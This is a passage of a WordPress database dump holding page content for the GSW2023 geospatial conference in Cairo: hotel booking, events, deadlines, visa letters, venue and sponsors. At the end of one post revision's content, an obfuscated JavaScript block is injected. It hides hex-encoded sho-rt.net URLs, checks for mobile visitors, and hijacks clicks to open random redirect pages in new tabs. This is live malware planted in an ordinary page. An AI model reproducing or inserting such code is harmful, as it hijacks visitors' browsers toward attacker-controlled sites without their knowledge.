data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:24:01','2023-08-15 23:24:01','',3066,'https://gsw2023.com/?p=5219',0,'revision','',0),
(5220,1,'2023-08-15 23:25:35','2023-08-15 23:25:35','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner]\r\n\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" 